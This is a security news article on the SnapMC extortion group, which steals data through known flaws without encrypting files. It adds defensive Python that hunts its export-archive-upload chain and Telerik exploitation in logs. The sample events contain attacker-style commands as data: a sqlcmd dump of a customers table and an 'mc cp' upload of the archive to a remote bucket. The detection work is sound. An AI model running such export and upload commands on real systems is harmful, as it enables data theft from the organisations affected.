SnapMC Attackers Skip File Encryption and Hijack the Files

A new threat actor tracked as SnapMC has appeared in the cybercrime space, running the data-theft extortion scheme that underpins today's ransomware operations but skipping the file encryption part entirely.

File encryption is considered the core component of a ransomware attack, as it is the element that disrupts the victim's operations. Data exfiltration for double extortion came later as an additional form of leverage against the victim, but it always took a back seat to the mayhem caused by an encrypted network.

Ransomware attackers soon realized the power of this approach: many organizations could restore encrypted files from backups, but no one can undo a data theft or its repercussions.

Investigators at NCC Group have been tracking the new adversary, which they named SnapMC after the speed of its attacks: the gang breaks into a network, steals files and sends its extortion emails in under 30 minutes.

Exploiting known vulnerabilities

The SnapMC gang uses the Acunetix vulnerability scanner to find a range of flaws in a target's VPN appliances and web server applications, then exploits them to breach the corporate network.

The flaws most often exploited for initial access are the PrintNightmare local privilege escalation (CVE-2021-34527), remote code execution in Telerik UI for ASP.NET AJAX (CVE-2019-18935), and various SQL injection bugs in web applications.

The actors run SQL database export scripts to collect the data, and the resulting CSV files are compressed with the 7-Zip archive utility before exfiltration. Once everything is neatly packed, the MinIO client (mc, which lends the group the second half of its name) is used to push the data to attacker-controlled storage.
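The export, archive and upload sequence above is a useful hunting pattern in its own right: each tool is legitimate, but all three running on one host within minutes is not normal. The following is an added example, not code from the article or from NCC Group's report. It scans process-creation events for that chain; the event layout, the sample events and the list of tool names are constructed assumptions and should be adjusted to the telemetry you actually collect.

```python
"""Hunt for the SnapMC-style exfiltration chain in process-creation events.

Added example (not from the article or the NCC Group report): flags a host on
which a database export tool, the 7-Zip CLI and the MinIO client (mc) run, in
that order, within a short window. Event format and sample data are constructed.
"""
from datetime import datetime, timedelta

# Stage classification by process image name (case-insensitive). The names are
# assumptions about what the tooling looks like on a Windows host; extend them
# for the export tools and archivers used in your own estate.
STAGES = {
    "export": {"sqlcmd.exe", "bcp.exe", "mysqldump.exe", "pg_dump.exe"},
    "archive": {"7z.exe", "7za.exe", "7zg.exe"},
    "exfil": {"mc.exe", "mc", "minio-client.exe"},
}
ORDER = ["export", "archive", "exfil"]

# Constructed sample events: (host, UTC timestamp, process image, command line).
SAMPLE_EVENTS = [
    ("web01", "2021-10-08T09:01:10Z", r"C:\Tools\sqlcmd.exe",
     'sqlcmd -S . -Q "SELECT * FROM customers" -o C:\\Windows\\Temp\\c.csv'),
    ("web01", "2021-10-08T09:04:32Z", r"C:\Windows\Temp\7z.exe",
     "7z a C:\\Windows\\Temp\\out.7z C:\\Windows\\Temp\\c.csv"),
    ("web01", "2021-10-08T09:06:05Z", r"C:\Windows\Temp\mc.exe",
     "mc cp C:\\Windows\\Temp\\out.7z remote/bucket/"),
    # Lone archive job on another host: no export, no upload, so not a chain.
    ("db02", "2021-10-08T11:15:00Z", r"C:\Windows\Temp\7z.exe", "7z a backup.7z D:\\backups"),
]


def classify(image):
    """Map a process image path to a chain stage, or None if it is not of interest."""
    name = image.replace("\\", "/").rsplit("/", 1)[-1].lower()
    for stage, names in STAGES.items():
        if name in names:
            return stage
    return None


def parse_ts(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")


def find_chains(events, window=timedelta(minutes=30)):
    """Return one finding per host where export -> archive -> exfil occurs within window."""
    by_host = {}
    for host, ts, image, cmd in events:
        stage = classify(image)
        if stage:
            by_host.setdefault(host, []).append((parse_ts(ts), stage, cmd))

    findings = []
    for host, evs in by_host.items():
        evs.sort()
        for i, (t0, s0, c0) in enumerate(evs):
            if s0 != "export":
                continue
            seen, want = {"export": c0}, 1
            for t, s, c in evs[i + 1:]:
                if t - t0 > window:
                    break
                if s == ORDER[want]:
                    seen[s] = c
                    want += 1
                    if want == len(ORDER):
                        findings.append({"host": host, "start": t0, "end": t, "stages": seen})
                        break
    return findings


if __name__ == "__main__":
    for f in find_chains(SAMPLE_EVENTS):
        print(f"{f['host']}: export->archive->exfil between {f['start']} and {f['end']}")
```

The 30-minute window mirrors the dwell time the article reports; a slower actor would need a wider window, and a single host seeing only the archive and upload stages is still worth a look.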

Since SnapMC relies on known vulnerabilities for which patches already exist, keeping software up to date is the most effective defense against this rising threat.


As NCC Group points out in its report, even an organization running a vulnerable version of Telerik would have blunted these attacks by placing the application behind a well-configured web application firewall, which blocks the known exploit traffic.
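Two practical checks follow from the last two paragraphs: whether the deployed Telerik build is old enough to be exposed, and whether anyone is hammering the upload handler that the public exploit for CVE-2019-18935 abuses. The following is an added example, not code from the article or from NCC Group. It parses IIS W3C log lines (constructed here) for POSTs to the RadAsyncUpload handler and compares assembly version strings against the first Telerik release that mitigated the flaw; the alert threshold is an assumption.

```python
"""Flag RadAsyncUpload handler abuse in IIS W3C logs and screen Telerik versions.

Added example, not part of the article or the NCC Group report. Log lines are
constructed; the field layout follows the IIS W3C extended log format.
"""
import re
from collections import Counter

# The public exploit chain for CVE-2019-18935 POSTs to the RadAsyncUpload handler
# with type=rau. Legitimate uploads hit it too, so volume from one client is what
# separates background noise from an exploitation attempt.
HANDLER = "telerik.web.ui.webresource.axd"
# Telerik UI for ASP.NET AJAX through 2019.3.1023 is affected; 2020.1.114 is the
# first release in which the deserialization issue is mitigated by default.
FIXED_VERSION = (2020, 1, 114)

# Constructed sample log: one normal visitor and one client bursting the handler.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip sc-status
2021-10-08 08:58:01 10.0.0.5 GET /Default.aspx - 198.51.100.7 200
2021-10-08 08:58:02 10.0.0.5 POST /Telerik.Web.UI.WebResource.axd type=rau 203.0.113.9 200
2021-10-08 08:58:03 10.0.0.5 POST /Telerik.Web.UI.WebResource.axd type=rau 203.0.113.9 200
2021-10-08 08:58:04 10.0.0.5 POST /Telerik.Web.UI.WebResource.axd type=rau 203.0.113.9 500
2021-10-08 09:10:00 10.0.0.5 POST /Telerik.Web.UI.WebResource.axd type=rau 198.51.100.7 200
"""


def parse_w3c(text):
    """Turn W3C extended log text into a list of dicts keyed by the #Fields header."""
    fields, rows = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            rows.append(dict(zip(fields, line.split())))
    return rows


def rau_posts(rows):
    return [r for r in rows
            if r["cs-method"] == "POST"
            and r["cs-uri-stem"].lower().endswith(HANDLER)
            and "type=rau" in r["cs-uri-query"].lower()]


def suspicious_clients(rows, threshold=3):
    """Client IPs whose rau POST count reaches threshold, with 5xx responses counted.

    A 500 right after a burst is a common sign of the uploaded payload being
    deserialized; threshold=3 is an assumption, tune it to your upload traffic.
    """
    hits = rau_posts(rows)
    counts = Counter(r["c-ip"] for r in hits)
    return {
        ip: {
            "posts": n,
            "errors": sum(1 for r in hits if r["c-ip"] == ip and r["sc-status"].startswith("5")),
        }
        for ip, n in counts.items() if n >= threshold
    }


def parse_version(s):
    """Extract (year, release, build) from a Telerik version or assembly string."""
    m = re.search(r"(\d{4})\.(\d+)\.(\d+)", s)
    return tuple(int(x) for x in m.groups()) if m else None


def is_vulnerable(version_string):
    """True when the build predates the first release mitigating CVE-2019-18935."""
    v = parse_version(version_string)
    return v is not None and v < FIXED_VERSION


if __name__ == "__main__":
    print(suspicious_clients(parse_w3c(SAMPLE_LOG)))
    print(is_vulnerable("Telerik.Web.UI, Version=2019.3.1023.45"))
```

The version check is only a first screen: a build past 2020.1.114 can still be exposed if it was upgraded with the old, leaked encryption keys kept in web.config, so confirm the RadAsyncUpload configuration as well.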

Paying is dangerous

In data exfiltration extortion attacks, meeting the threat actor's demands by paying the ransom guarantees nothing. On the contrary, it gives the criminals an incentive to attempt further extortion in the future.

It is also possible that even if a victim pays a ransom, their data may end up sold on criminal marketplaces or hacker forums as an additional way of generating revenue for the attackers.

Ransomware negotiation firm Coveware strongly advises its clients never to pay a ransom in the hope of preventing stolen files from being leaked. In past negotiation cases, victims paid the ransom and their data was leaked anyway, or no proof of deletion was ever provided:

  • Sodinokibi: Victims that paid were re-extorted weeks later with threats to post the same data set.
  • Netwalker: Data of companies that had paid for it not to be leaked was posted anyway.
  • Mespinoza: Data of companies that had paid for it not to be leaked was posted anyway.
  • Conti: Fake files were shown as proof of deletion.

Due to this, victims should automatically assume that their data has been shared with other threat actors and that it will be used or leaked in the future, regardless of whether they paid a ransom.
